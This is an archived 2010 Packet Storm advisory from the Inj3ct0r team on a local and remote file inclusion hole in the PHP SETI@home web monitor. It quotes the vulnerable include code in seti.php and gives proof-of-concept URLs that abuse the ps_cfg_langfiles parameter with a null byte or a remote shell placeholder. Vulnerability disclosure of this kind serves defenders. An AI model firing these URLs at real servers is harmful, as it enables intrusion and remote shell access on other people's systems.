PHP SETI@Home Web Monitor Local File Inclusion / Remote File Inclusion

2010-06-04T00:00:00
ID PACKETSTORM:90269
Type packetstorm
Reporter eidelweiss
Modified 2010-06-04T00:00:00

Description

                                        
                                            `===========================================================================  
PHP SETI@home web monitor (phpsetimon) RFI / LFI Vulnerability  
===========================================================================  
  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : Inj3ct0r.com 0  
1 [+] Support e-mail : submit[at]inj3ct0r.com 1  
0 0  
1 ######################################## 1  
0 I'm eidelweiss member from Inj3ct0r Team 1  
1 ######################################## 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
Home Page: http://setiathome.ssl.berkeley.edu/  
download: http://www.mariovaldez.net/software/phpsetimon/  
Author: eidelweiss  
Contact: g1xsystem[at]windowslive.com  
  
=====================================================================  
  
Description:  
  
The PHP SETI@home web monitor is a very simple PHP script to monitor single or multiple setiathome programs running in your workstation or server, via the local web server.   
If you don't know what is SETI@home, visit the SETI@home website.   
  
=====================================================================  
  
--=[ Vuln C0de ]=-  
  
[-] path/seti.php  
  
-----------------------------------------------------------------------------------------  
  
require_once ("seticlients.inc.php");  
require_once ("config.inc.php");  
  
$ps_charset = "iso-8859-1";  
if ($ps_cfg_language <> "")  
$ps_htmllang = "<meta http-equiv='Content-Type' content='text/html; charset=$ps_charset'>\n";  
$ps_languages = array ("es" => 1, "en" => 1);  
if (array_key_exists (strtolower ($ps_cfg_language), $ps_languages)) {  
$ps_cfg_language = strtolower ($ps_cfg_language);  
require_once ($ps_cfg_langfiles . $ps_cfg_language. ".inc.php");  
}  
else { $ps_cfg_language = "en"; include($ps_cfg_langfiles . "en.inc.php"); }  
  
require_once ("seti_lib.inc.php");  
require_once ("seti_data.inc.php");  
require_once ("seti_graphs.inc.php");  
  
-----------------------------------------------------------------------------------------  
  
-=[ P0C LFI ]=-  
  
http://127.0.0.1/path/seti.php?ps_cfg_langfiles= [LFI]%00  
  
-=[ P0C RFI ]=-  
  
http://127.0.0.1/path/seti.php?ps_cfg_langfiles= [inj3ct0r sh3ll]  
  
  
=========================| -=[ E0F ]=- |=========================  
`